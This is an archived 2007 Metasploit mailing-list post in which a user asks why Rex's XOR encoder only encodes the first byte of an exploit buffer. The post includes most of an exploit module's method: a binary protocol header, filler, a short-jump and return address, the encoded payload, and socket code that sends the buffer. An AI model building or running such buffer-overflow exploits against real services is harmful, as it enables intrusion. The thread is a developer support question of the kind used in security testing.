Metasploit mailing list archives
Need assistance with payload xor
From: ri0t at ri0tnet.net (ri0t)
Date: Wed, 28 Mar 2007 12:52:21 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 having a bit of trouble xor'ing a payload in the new metasploit 3 using Rex::Encoding::Xor::Generic below is a small snippet of code def exploit xor = Rex::Encoding::Xor::Generic connect print_status("Trying target #{target.name}...") header = "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00 \x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x01"+ "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" filler = rand_text_english(1) * (target['Offset']) jump = [0xeb06eb06].pack("V") retadd = [target.ret].pack('V') buffer=jump+retadd+payload.encoded buffercoded= xor.encode(buffer, [0xb3].pack("V")) sploit = header + filler + buffercoded[0] sock.put(sploit) handler disconnect end unfortunatly the xor.encode only xor's the first byte of jump retadd and payload not the entire buffer. I am sure its something i am missing due to a simple lack of ruby knowledge but if anyone could point me in the right direction i would be greatful thanks ri0t -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFGCqtamTIaeYQNnq0RArwMAJ4wYNj0NszcdydMUSFTO4q6R2NyZwCbBnhP MtW4Qxkp0iH07XoDRsfrYZI= =Ss/h -----END PGP SIGNATURE-----
Current thread:
- Need assistance with payload xor ri0t (Mar 28)
- Need assistance with payload xor mmiller at hick.org (Mar 28)